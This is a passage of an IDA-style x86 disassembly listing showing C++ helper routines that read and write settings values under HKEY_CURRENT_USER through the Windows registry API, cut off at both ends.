push offset asc_4174F4 ; "\\"
mov ecx, [ebp-38h]
add ecx, 8
call sub_411560
lea eax, [ebp-34h]
push eax
mov ecx, [ebp-38h]
call sub_406EDD
mov dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp+8]
call sub_411512
mov eax, [ebp-38h]
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
pop esi
mov esp, ebp
pop ebp
retn 1Ch
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
mov [ebp-4], ecx
mov ecx, [ebp-4]
call sub_408020
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406EDD proc near ; CODE XREF: HSho:00406EA2�p
; HSho:00407132�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2Ch
mov [ebp+var_2C], ecx
mov eax, [ebp+var_2C]
add eax, 4
push eax
push 20019h
push 0
mov ecx, [ebp+var_2C]
add ecx, 0Ch
call sub_4026A0
push eax
mov ecx, [ebp+var_2C]
mov edx, [ecx]
push edx
call dword_413004 ; RegOpenKeyExA
test eax, eax
jnz loc_407038
mov [ebp+var_8], 0
lea eax, [ebp+var_8]
push eax
push 0
lea ecx, [ebp+var_C]
push ecx
push 0
mov ecx, [ebp+var_2C]
add ecx, 8
call sub_4026A0
push eax
mov edx, [ebp+var_2C]
mov eax, [edx+4]
push eax
call dword_413010 ; RegQueryValueExA
mov ecx, [ebp+var_8]
push ecx
call sub_4114F4
add esp, 4
mov [ebp+var_10], eax
mov edx, [ebp+var_10]
mov [ebp+var_4], edx
lea eax, [ebp+var_8]
push eax
mov ecx, [ebp+var_4]
push ecx
lea edx, [ebp+var_C]
push edx
push 0
mov ecx, [ebp+var_2C]
add ecx, 8
call sub_4026A0
push eax
mov eax, [ebp+var_2C]
mov ecx, [eax+4]
push ecx
call dword_413010 ; RegQueryValueExA
test eax, eax
jnz short loc_406FF5
mov edx, [ebp+var_4]
push edx
lea ecx, [ebp+var_20]
call sub_408150
mov ecx, [ebp+var_2C]
add ecx, 10h
mov edx, [eax]
mov [ecx], edx
mov edx, [eax+4]
mov [ecx+4], edx
mov edx, [eax+8]
mov [ecx+8], edx
mov eax, [eax+0Ch]
mov [ecx+0Ch], eax
mov ecx, [ebp+var_4]
mov [ebp+var_24], ecx
mov edx, [ebp+var_24]
push edx
call sub_4114EE
add esp, 4
mov eax, [ebp+var_2C]
mov dword ptr [eax+30h], 1
mov ecx, [ebp+var_2C]
mov edx, [ecx+4]
push edx
call dword_413000 ; RegCloseKey
mov eax, [ebp+var_2C]
add eax, 10h
mov ecx, [ebp+arg_0]
mov edx, [eax]
mov [ecx], edx
mov edx, [eax+4]
mov [ecx+4], edx
mov edx, [eax+8]
mov [ecx+8], edx
mov eax, [eax+0Ch]
mov [ecx+0Ch], eax
mov eax, [ebp+arg_0]
jmp short loc_40705A
; ---------------------------------------------------------------------------
loc_406FF5: ; CODE XREF: sub_406EDD+A1�j
mov ecx, [ebp+var_4]
mov [ebp+var_28], ecx
mov edx, [ebp+var_28]
push edx
call sub_4114EE
add esp, 4
mov eax, [ebp+var_2C]
mov ecx, [eax+4]
push ecx
call dword_413000 ; RegCloseKey
mov edx, [ebp+var_2C]
add edx, 20h
mov eax, [ebp+arg_0]
mov ecx, [edx]
mov [eax], ecx
mov ecx, [edx+4]
mov [eax+4], ecx
mov ecx, [edx+8]
mov [eax+8], ecx
mov edx, [edx+0Ch]
mov [eax+0Ch], edx
mov eax, [ebp+arg_0]
jmp short loc_40705A
; ---------------------------------------------------------------------------
loc_407038: ; CODE XREF: sub_406EDD+31�j
mov eax, [ebp+var_2C]
add eax, 20h
mov ecx, [ebp+arg_0]
mov edx, [eax]
mov [ecx], edx
mov edx, [eax+4]
mov [ecx+4], edx
mov edx, [eax+8]
mov [ecx+8], edx
mov eax, [eax+0Ch]
mov [ecx+0Ch], eax
mov eax, [ebp+arg_0]
loc_40705A: ; CODE XREF: sub_406EDD+116�j
; sub_406EDD+159�j
mov esp, ebp
pop ebp
retn 4
sub_406EDD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407060 proc near ; CODE XREF: HSho:004071A1�p
var_8 = dword ptr -8
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
lea eax, [ebp+var_4]
push eax
mov ecx, [ebp+var_8]
add ecx, 4
push ecx
push 0
push 20006h
push 0
push offset dword_419C68
push 0
mov ecx, [ebp+var_8]
add ecx, 0Ch
call sub_4026A0
push eax
mov edx, [ebp+var_8]
mov eax, [edx]
push eax
call dword_41300C ; RegCreateKeyExA
test eax, eax
jz short loc_4070A2
jmp short loc_4070E8
; ---------------------------------------------------------------------------
loc_4070A2: ; CODE XREF: sub_407060+3E�j
push 10h
mov ecx, [ebp+var_8]
add ecx, 10h
call sub_408170
push eax
push 3
push 0
mov ecx, [ebp+var_8]
add ecx, 8
call sub_4026A0
push eax
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
push edx
call dword_413008 ; RegSetValueExA
test eax, eax
jnz short loc_4070DB
mov eax, [ebp+var_8]
mov dword ptr [eax+30h], 1
loc_4070DB: ; CODE XREF: sub_407060+6F�j
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
push edx
call dword_413000 ; RegCloseKey
loc_4070E8: ; CODE XREF: sub_407060+40�j
mov esp, ebp
pop ebp
retn
sub_407060 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 14h
mov [ebp-14h], ecx
mov eax, [ebp-14h]
cmp dword ptr [eax+30h], 0
jz short loc_40712B
mov ecx, [ebp-14h]
cmp dword ptr [ecx+34h], 0
jnz short loc_40712B
mov edx, [ebp-14h]
add edx, 10h
mov eax, [ebp+8]
mov ecx, [edx]
mov [eax], ecx
mov ecx, [edx+4]
mov [eax+4], ecx
mov ecx, [edx+8]
mov [eax+8], ecx
mov edx, [edx+0Ch]
mov [eax+0Ch], edx
mov eax, [ebp+8]
jmp short loc_407153
; ---------------------------------------------------------------------------
loc_40712B: ; CODE XREF: HSho:004070FC�j
; HSho:00407105�j
lea eax, [ebp-10h]
push eax
mov ecx, [ebp-14h]
call sub_406EDD
mov ecx, [ebp+8]
mov edx, [eax]
mov [ecx], edx
mov edx, [eax+4]
mov [ecx+4], edx
mov edx, [eax+8]
mov [ecx+8], edx
mov eax, [eax+0Ch]
mov [ecx+0Ch], eax
mov eax, [ebp+8]
loc_407153: ; CODE XREF: HSho:00407129�j
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
mov [ebp-4], ecx
mov eax, [ebp-4]
add eax, 10h
push eax
lea ecx, [ebp+8]
call sub_408180
test eax, eax
jz short loc_407181
mov ecx, [ebp-4]
cmp dword ptr [ecx+34h], 0
jnz short loc_407181
mov eax, [ebp-4]
jmp short loc_4071A9
; ---------------------------------------------------------------------------
loc_407181: ; CODE XREF: HSho:00407171�j
; HSho:0040717A�j
mov edx, [ebp-4]
add edx, 10h
mov eax, [ebp+8]
mov [edx], eax
mov ecx, [ebp+0Ch]
mov [edx+4], ecx
mov eax, [ebp+10h]
mov [edx+8], eax
mov ecx, [ebp+14h]
mov [edx+0Ch], ecx
mov ecx, [ebp-4]
call sub_407060
mov eax, [ebp-4]
loc_4071A9: ; CODE XREF: HSho:0040717F�j
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset loc_41233A
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 14h
mov [ebp-20h], ecx
mov ecx, [ebp-20h]
call sub_407FC0
mov dword ptr [ebp-4], 0
mov ecx, [ebp-20h]
add ecx, 10h
call sub_408170
mov ecx, [ebp-20h]
add ecx, 18h
call sub_408170
push 0
push 0
lea ecx, [ebp-14h]
call sub_4081A0
mov ecx, [eax]
mov edx, [eax+4]
mov eax, [ebp-20h]
mov [eax+10h], ecx
mov [eax+14h], edx
push 0
push 0
lea ecx, [ebp-1Ch]
call sub_4081A0
mov ecx, [eax]
mov edx, [eax+4]
mov eax, [ebp-20h]
mov [eax+18h], ecx
mov [eax+1Ch], edx
push offset dword_419C6C
mov ecx, [ebp-20h]
add ecx, 8
call sub_41150C
mov ecx, [ebp-20h]
mov dword ptr [ecx], 80000001h
mov edx, [ebp-20h]
mov dword ptr [edx+20h], 0
mov eax, [ebp-20h]
mov dword ptr [eax+24h], 0
mov dword ptr [ebp-4], 0FFFFFFFFh
mov eax, [ebp-20h]
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset loc_412368
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 2Ch
push esi
mov [ebp-28h], ecx
mov dword ptr [ebp-4], 0
mov ecx, [ebp-28h]
call sub_407FC0
mov byte ptr [ebp-4], 1
mov ecx, [ebp-28h]
add ecx, 10h
call sub_408170
mov ecx, [ebp-28h]
add ecx, 18h
call sub_408170
push 0
push 0
lea ecx, [ebp-14h]
call sub_4081A0
mov ecx, [eax]
mov edx, [eax+4]
mov eax, [ebp-28h]
mov [eax+10h], ecx
mov [eax+14h], edx
mov ecx, [ebp-28h]
mov edx, [ebp+0Ch]
mov [ecx+18h], edx
mov eax, [ebp+10h]
mov [ecx+1Ch], eax
mov ecx, [ebp-28h]
mov edx, [ebp+14h]
mov [ecx+24h], edx
mov eax, [ebp-28h]
mov ecx, [ebp+18h]
mov [eax], ecx
mov edx, [ebp-28h]
mov dword ptr [edx+20h], 0
push offset asc_4174F8 ; "\\"
lea ecx, [ebp+8]
call sub_411566
push 5Ch
lea ecx, [ebp+8]
call sub_411536
push eax
lea eax, [ebp-18h]
push eax
lea ecx, [ebp+8]
call sub_411530
mov [ebp-2Ch], eax
mov ecx, [ebp-2Ch]
mov [ebp-30h], ecx
mov byte ptr [ebp-4], 2
mov edx, [ebp-30h]
push edx
mov ecx, [ebp-28h]
add ecx, 0Ch
call sub_411518
mov byte ptr [ebp-4], 1
lea ecx, [ebp-18h]
call sub_411512
push offset asc_4174FC ; "\\"
mov ecx, [ebp-28h]
add ecx, 0Ch
call sub_411560
lea ecx, [ebp+8]
call sub_408070
mov esi, eax
push 5Ch
lea ecx, [ebp+8]
call sub_411536
sub esi, eax
push esi
lea eax, [ebp-1Ch]
push eax
lea ecx, [ebp+8]
call sub_41155A
mov [ebp-34h], eax
mov ecx, [ebp-34h]
mov [ebp-38h], ecx
mov byte ptr [ebp-4], 3
mov edx, [ebp-38h]
push edx
mov ecx, [ebp-28h]
add ecx, 8
call sub_411518
mov byte ptr [ebp-4], 1
lea ecx, [ebp-1Ch]
call sub_411512
push offset asc_417500 ; "\\"
mov ecx, [ebp-28h]
add ecx, 8
call sub_411566
push offset asc_417504 ; "\\"
mov ecx, [ebp-28h]
add ecx, 8
call sub_411560
lea eax, [ebp-24h]
push eax
mov ecx, [ebp-28h]
call sub_407400
mov dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp+8]
call sub_411512
mov eax, [ebp-28h]
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
pop esi
mov esp, ebp
pop ebp
retn 14h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
mov [ebp-4], ecx
mov ecx, [ebp-4]
call sub_408020
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407400 proc near ; CODE XREF: HSho:004073C5�p
; HSho:00407610�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 24h
mov [ebp+var_24], ecx
mov eax, [ebp+var_24]
add eax, 4
push eax
push 20019h
push 0
mov ecx, [ebp+var_24]
add ecx, 0Ch
call sub_4026A0
push eax
mov ecx, [ebp+var_24]
mov edx, [ecx]
push edx
call dword_413004 ; RegOpenKeyExA
test eax, eax
jnz loc_407537
mov [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push 0
lea ecx, [ebp+var_8]
push ecx
push 0
mov ecx, [ebp+var_24]
add ecx, 8
call sub_4026A0
push eax
mov edx, [ebp+var_24]
mov eax, [edx+4]
push eax
call dword_413010 ; RegQueryValueExA
mov ecx, [ebp+var_4]
push ecx
call sub_4114F4
add esp, 4
mov [ebp+var_10], eax
mov edx, [ebp+var_10]
mov [ebp+var_C], edx
lea eax, [ebp+var_4]
push eax
mov ecx, [ebp+var_C]
push ecx
lea edx, [ebp+var_8]
push edx
push 0
mov ecx, [ebp+var_24]
add ecx, 8
call sub_4026A0
push eax
mov eax, [ebp+var_24]
mov ecx, [eax+4]
push ecx
call dword_413010 ; RegQueryValueExA
test eax, eax
jnz short loc_407502
mov edx, [ebp+var_C]
mov eax, [edx+4]
push eax
mov ecx, [edx]
push ecx
lea ecx, [ebp+var_18]
call sub_4081D0
mov edx, [eax]
mov eax, [eax+4]
mov ecx, [ebp+var_24]
mov [ecx+10h], edx
mov [ecx+14h], eax
mov edx, [ebp+var_C]
mov [ebp+var_1C], edx
mov eax, [ebp+var_1C]
push eax
call sub_4114EE
add esp, 4
mov ecx, [ebp+var_24]
mov dword ptr [ecx+20h], 1
mov edx, [ebp+var_24]
mov eax, [edx+4]
push eax
call dword_413000 ; RegCloseKey
mov ecx, [ebp+var_24]
mov edx, [ecx+10h]
mov eax, [ecx+14h]
mov ecx, [ebp+arg_0]
mov [ecx], edx
mov [ecx+4], eax
mov eax, [ebp+arg_0]
jmp short loc_40754B
; ---------------------------------------------------------------------------
loc_407502: ; CODE XREF: sub_407400+A1�j
mov edx, [ebp+var_C]
mov [ebp+var_20], edx
mov eax, [ebp+var_20]
push eax
call sub_4114EE
add esp, 4
mov ecx, [ebp+var_24]
mov edx, [ecx+4]
push edx
call dword_413000 ; RegCloseKey
mov eax, [ebp+var_24]
mov ecx, [eax+18h]
mov edx, [eax+1Ch]
mov eax, [ebp+arg_0]
mov [eax], ecx
mov [eax+4], edx
mov eax, [ebp+arg_0]
jmp short loc_40754B
; ---------------------------------------------------------------------------
loc_407537: ; CODE XREF: sub_407400+31�j
mov ecx, [ebp+var_24]
mov edx, [ecx+18h]
mov eax, [ecx+1Ch]
mov ecx, [ebp+arg_0]
mov [ecx], edx
mov [ecx+4], eax
mov eax, [ebp+arg_0]
loc_40754B: ; CODE XREF: sub_407400+100�j
; sub_407400+135�j
mov esp, ebp
pop ebp
retn 4
sub_407400 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407551 proc near ; CODE XREF: HSho:00407677�p
var_8 = dword ptr -8
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
lea eax, [ebp+var_4]
push eax
mov ecx, [ebp+var_8]
add ecx, 4
push ecx
push 0
push 20006h
push 0
push offset dword_419C70
push 0
mov ecx, [ebp+var_8]
add ecx, 0Ch
call sub_4026A0
push eax
mov edx, [ebp+var_8]
mov eax, [edx]
push eax
call dword_41300C ; RegCreateKeyExA
test eax, eax
jz short loc_407593
jmp short loc_4075D4
; ---------------------------------------------------------------------------
loc_407593: ; CODE XREF: sub_407551+3E�j
push 8
mov ecx, [ebp+var_8]
add ecx, 10h
push ecx
push 3
push 0
mov ecx, [ebp+var_8]
add ecx, 8
call sub_4026A0
push eax
mov edx, [ebp+var_8]
mov eax, [edx+4]
push eax
call dword_413008 ; RegSetValueExA
test eax, eax
jnz short loc_4075C7
mov ecx, [ebp+var_8]
mov dword ptr [ecx+20h], 1
loc_4075C7: ; CODE XREF: sub_407551+6A�j
mov edx, [ebp+var_8]
mov eax, [edx+4]
push eax
call dword_413000 ; RegCloseKey
loc_4075D4: ; CODE XREF: sub_407551+40�j
mov esp, ebp
pop ebp
retn
sub_407551 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp-0Ch], ecx
mov eax, [ebp-0Ch]
cmp dword ptr [eax+20h], 0
jz short loc_407609
mov ecx, [ebp-0Ch]
cmp dword ptr [ecx+24h], 0
jnz short loc_407609
mov edx, [ebp-0Ch]
mov eax, [edx+10h]
mov ecx, [edx+14h]
mov edx, [ebp+8]
mov [edx], eax
mov [edx+4], ecx
mov eax, [ebp+8]
jmp short loc_407625
; ---------------------------------------------------------------------------
loc_407609: ; CODE XREF: HSho:004075E8�j
; HSho:004075F1�j
lea eax, [ebp-8]
push eax
mov ecx, [ebp-0Ch]
call sub_407400
mov ecx, [eax]
mov edx, [eax+4]
mov eax, [ebp+8]
mov [eax], ecx
mov [eax+4], edx
mov eax, [ebp+8]
loc_407625: ; CODE XREF: HSho:00407607�j
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp-0Ch], ecx
mov eax, [ebp-0Ch]
mov ecx, [eax+10h]
mov edx, [eax+14h]
mov [ebp-8], ecx
mov [ebp-4], edx
mov eax, [ebp-4]
push eax
mov ecx, [ebp-8]
push ecx
lea ecx, [ebp+8]
call sub_4081F0
test eax, eax
jz short loc_407665
mov edx, [ebp-0Ch]
cmp dword ptr [edx+24h], 0
jnz short loc_407665
mov eax, [ebp-0Ch]
jmp short loc_40767F
; ---------------------------------------------------------------------------
loc_407665: ; CODE XREF: HSho:00407655�j
; HSho:0040765E�j
mov eax, [ebp-0Ch]
mov ecx, [ebp+8]
mov [eax+10h], ecx
mov edx, [ebp+0Ch]
mov [eax+14h], edx
mov ecx, [ebp-0Ch]
call sub_407551
mov eax, [ebp-0Ch]
loc_40767F: ; CODE XREF: HSho:00407663�j
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset loc_412395
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
mov [ebp-18h], ecx
mov ecx, [ebp-18h]
call sub_408230
mov dword ptr [ebp-4], 0
lea eax, [ebp-10h]
push eax
mov ecx, [ebp-18h]
add ecx, 28h
call dword_41316C
mov byte ptr [ebp-4], 1
lea ecx, [ebp-14h]
push ecx
mov ecx, [ebp-18h]
add ecx, 38h
call dword_41316C
mov byte ptr [ebp-4], 2
push offset dword_419C74
mov ecx, [ebp-18h]
add ecx, 28h
call dword_413194
push offset dword_419C78
mov ecx, [ebp-18h]
add ecx, 38h
call dword_413194
push offset dword_419C7C
mov ecx, [ebp-18h]
add ecx, 8
call dword_413194
mov edx, [ebp-18h]
mov dword ptr [edx], 80000001h
mov eax, [ebp-18h]
mov dword ptr [eax+48h], 0
mov ecx, [ebp-18h]
mov dword ptr [ecx+4Ch], 0
mov dword ptr [ebp-4], 0FFFFFFFFh
mov eax, [ebp-18h]
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset loc_4123EA
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 50h
mov [ebp-4Ch], ecx
mov dword ptr [ebp-4], 1
mov ecx, [ebp-4Ch]
call sub_408230
mov byte ptr [ebp-4], 2
lea eax, [ebp-14h]
push eax
mov ecx, [ebp-4Ch]
add ecx, 28h
call dword_41316C
mov byte ptr [ebp-4], 3
lea ecx, [ebp-18h]
push ecx
mov ecx, [ebp-4Ch]
add ecx, 38h
call dword_41316C
mov byte ptr [ebp-4], 4
push offset dword_419C80
mov ecx, [ebp-4Ch]
add ecx, 28h
call dword_413194
lea edx, [ebp+18h]
push edx
mov ecx, [ebp-4Ch]
add ecx, 38h
call dword_41317C
mov eax, [ebp-4Ch]
mov ecx, [ebp+28h]
mov [eax+4Ch], ecx
mov edx, [ebp-4Ch]
mov eax, [ebp+2Ch]
mov [edx], eax
mov ecx, [ebp-4Ch]
mov dword ptr [ecx+48h], 0
mov edx, dword_413178
mov eax, [edx]
push eax
push 5Ch
lea ecx, [ebp+8]
call dword_413174
mov [ebp-10h], eax
mov ecx, [ebp-10h]
push ecx
push 0
lea edx, [ebp-28h]
push edx
lea ecx, [ebp+8]
call dword_413170
mov [ebp-50h], eax
mov eax, [ebp-50h]
mov [ebp-54h], eax
mov byte ptr [ebp-4], 5
mov ecx, [ebp-54h]
push ecx
mov ecx, [ebp-4Ch]
add ecx, 18h
call dword_41317C
mov byte ptr [ebp-4], 4
lea ecx, [ebp-28h]
call dword_413168
mov edx, dword_413178
mov eax, [edx]
push eax
mov ecx, [ebp-10h]
add ecx, 1
push ecx
lea edx, [ebp-38h]
push edx
lea ecx, [ebp+8]
call dword_413170
mov [ebp-58h], eax
mov eax, [ebp-58h]
mov [ebp-5Ch], eax
mov byte ptr [ebp-4], 6
mov ecx, [ebp-5Ch]
push ecx
mov ecx, [ebp-4Ch]
add ecx, 8
call dword_41317C
mov byte ptr [ebp-4], 4
lea ecx, [ebp-38h]
call dword_413168
lea edx, [ebp-48h]
push edx
mov ecx, [ebp-4Ch]
call sub_407913
lea ecx, [ebp-48h]
call dword_413168
mov byte ptr [ebp-4], 0
lea ecx, [ebp+8]
call dword_413168
mov dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp+18h]
call dword_413168
mov eax, [ebp-4Ch]
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn 28h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset loc_41240A
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov [ebp-10h], ecx
mov dword ptr [ebp-4], 1
mov ecx, [ebp-10h]
add ecx, 38h
call dword_413168
mov byte ptr [ebp-4], 0
mov ecx, [ebp-10h]
add ecx, 28h
call dword_413168
mov dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, [ebp-10h]
call sub_408290
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407913 proc near ; CODE XREF: HSho:00407879�p
; HSho:00407B56�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
mov [ebp+var_20], ecx
mov [ebp+var_1C], 0
mov eax, [ebp+var_20]
add eax, 4
push eax
push 20019h
push 0
mov ecx, [ebp+var_20]
add ecx, 18h
call dword_413188
push eax
mov ecx, [ebp+var_20]
mov edx, [ecx]
push edx
call dword_413004 ; RegOpenKeyExA
test eax, eax
jnz loc_407A52
mov [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push 0
lea ecx, [ebp+var_C]
push ecx
push 0
mov ecx, [ebp+var_20]
add ecx, 8
call dword_413188
push eax
mov edx, [ebp+var_20]
mov eax, [edx+4]
push eax
call dword_413010 ; RegQueryValueExA
mov ecx, [ebp+var_4]
push ecx
call sub_4114F4
add esp, 4
mov [ebp+var_10], eax
mov edx, [ebp+var_10]
mov [ebp+var_8], edx
lea eax, [ebp+var_4]
push eax
mov ecx, [ebp+var_8]
push ecx
lea edx, [ebp+var_C]
push edx
push 0
mov ecx, [ebp+var_20]
add ecx, 8
call dword_413188
push eax
mov eax, [ebp+var_20]
mov ecx, [eax+4]
push ecx
call dword_413010 ; RegQueryValueExA
test eax, eax
jnz short loc_407A16
mov edx, [ebp+var_8]
push edx
mov ecx, [ebp+var_20]
add ecx, 28h
call dword_413184
mov eax, [ebp+var_8]
mov [ebp+var_14], eax
mov ecx, [ebp+var_14]
push ecx
call sub_4114EE
add esp, 4
mov edx, [ebp+var_20]
mov dword ptr [edx+48h], 1
mov eax, [ebp+var_20]
mov ecx, [eax+4]
push ecx
call dword_413000 ; RegCloseKey
mov edx, [ebp+var_20]
add edx, 28h
push edx
mov ecx, [ebp+arg_0]
call dword_413180
mov eax, [ebp+var_1C]
or al, 1
mov [ebp+var_1C], eax
mov eax, [ebp+arg_0]
jmp short loc_407A6E
; ---------------------------------------------------------------------------
loc_407A16: ; CODE XREF: sub_407913+AB�j
mov ecx, [ebp+var_8]
mov [ebp+var_18], ecx
mov edx, [ebp+var_18]
push edx
call sub_4114EE
add esp, 4
mov eax, [ebp+var_20]
mov ecx, [eax+4]
push ecx
call dword_413000 ; RegCloseKey
mov edx, [ebp+var_20]
add edx, 38h
push edx
mov ecx, [ebp+arg_0]
call dword_413180
mov eax, [ebp+var_1C]
or al, 1
mov [ebp+var_1C], eax
mov eax, [ebp+arg_0]
jmp short loc_407A6E
; ---------------------------------------------------------------------------
loc_407A52: ; CODE XREF: sub_407913+39�j
mov ecx, [ebp+var_20]
add ecx, 38h
push ecx
mov ecx, [ebp+arg_0]
call dword_413180
mov edx, [ebp+var_1C]
or edx, 1
mov [ebp+var_1C], edx
mov eax, [ebp+arg_0]
loc_407A6E: ; CODE XREF: sub_407913+101�j
; sub_407913+13D�j
mov esp, ebp
pop ebp
retn 4
sub_407913 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407A74 proc near ; CODE XREF: HSho:00407C6E�p
var_8 = dword ptr -8
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
lea eax, [ebp+var_4]
push eax
mov ecx, [ebp+var_8]
add ecx, 4
push ecx
push 0
push 20006h
push 0
push offset dword_419C84
push 0
mov ecx, [ebp+var_8]
add ecx, 18h
call dword_413188
push eax
mov edx, [ebp+var_8]
mov eax, [edx]
push eax
call dword_41300C ; RegCreateKeyExA
test eax, eax
jz short loc_407AB7
jmp short loc_407B0D
; ---------------------------------------------------------------------------
loc_407AB7: ; CODE XREF: sub_407A74+3F�j
mov ecx, [ebp+var_8]
add ecx, 28h
call dword_41318C
add eax, 1
push eax
mov ecx, [ebp+var_8]
add ecx, 28h
call dword_413188
push eax
push 1
push 0
mov ecx, [ebp+var_8]
add ecx, 8
call dword_413188
push eax
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
push edx
call dword_413008 ; RegSetValueExA
test eax, eax
jnz short loc_407B00
mov eax, [ebp+var_8]
mov dword ptr [eax+48h], 1
loc_407B00: ; CODE XREF: sub_407A74+80�j
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
push edx
call dword_413000 ; RegCloseKey
loc_407B0D: ; CODE XREF: sub_407A74+41�j
mov esp, ebp
pop ebp
retn
sub_407A74 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset loc_41241E
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 20h
mov [ebp-24h], ecx
mov eax, [ebp-24h]
cmp dword ptr [eax+48h], 0
jz short loc_407B4F
mov ecx, [ebp-24h]
cmp dword ptr [ecx+4Ch], 0
jnz short loc_407B4F
mov ecx, [ebp-24h]
add ecx, 28h
call dword_413188
jmp short loc_407B8A
; ---------------------------------------------------------------------------
loc_407B4F: ; CODE XREF: HSho:00407B36�j
; HSho:00407B3F�j
lea edx, [ebp-20h]
push edx
mov ecx, [ebp-24h]
call sub_407913
mov [ebp-28h], eax
mov eax, [ebp-28h]
mov [ebp-2Ch], eax
mov dword ptr [ebp-4], 0
mov ecx, [ebp-2Ch]
call dword_413188
mov [ebp-10h], eax
mov dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp-20h]
call dword_413168
mov eax, [ebp-10h]
loc_407B8A: ; CODE XREF: HSho:00407B4D�j
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
mov [ebp-8], ecx
mov dword ptr [ebp-4], 0
mov eax, [ebp-8]
cmp dword ptr [eax+48h], 0
jz short loc_407BD7
mov ecx, [ebp-8]
cmp dword ptr [ecx+4Ch], 0
jnz short loc_407BD7
mov edx, [ebp-8]
add edx, 28h
push edx
mov ecx, [ebp+8]
call dword_413180
mov eax, [ebp-4]
or al, 1
mov [ebp-4], eax
mov eax, [ebp+8]
jmp short loc_407BEF
; ---------------------------------------------------------------------------
loc_407BD7: ; CODE XREF: HSho:00407BAF�j
; HSho:00407BB8�j
mov ecx, [ebp+8]
push ecx
mov ecx, [ebp-8]
call sub_407913
mov edx, [ebp-4]
or edx, 1
mov [ebp-4], edx
mov eax, [ebp+8]
loc_407BEF: ; CODE XREF: HSho:00407BD5�j
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset loc_412432
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
mov [ebp-18h], ecx
mov dword ptr [ebp-4], 0
mov eax, [ebp-18h]
add eax, 28h
push eax
lea ecx, [ebp+8]
push ecx
call dword_413190
add esp, 8
and eax, 0FFh
test eax, eax
jz short loc_407C5B
mov edx, [ebp-18h]
cmp dword ptr [edx+4Ch], 0
jnz short loc_407C5B
mov eax, [ebp-18h]
mov [ebp-10h], eax
mov dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp+8]
call dword_413168
mov eax, [ebp-10h]
jmp short loc_407C8C
; ---------------------------------------------------------------------------
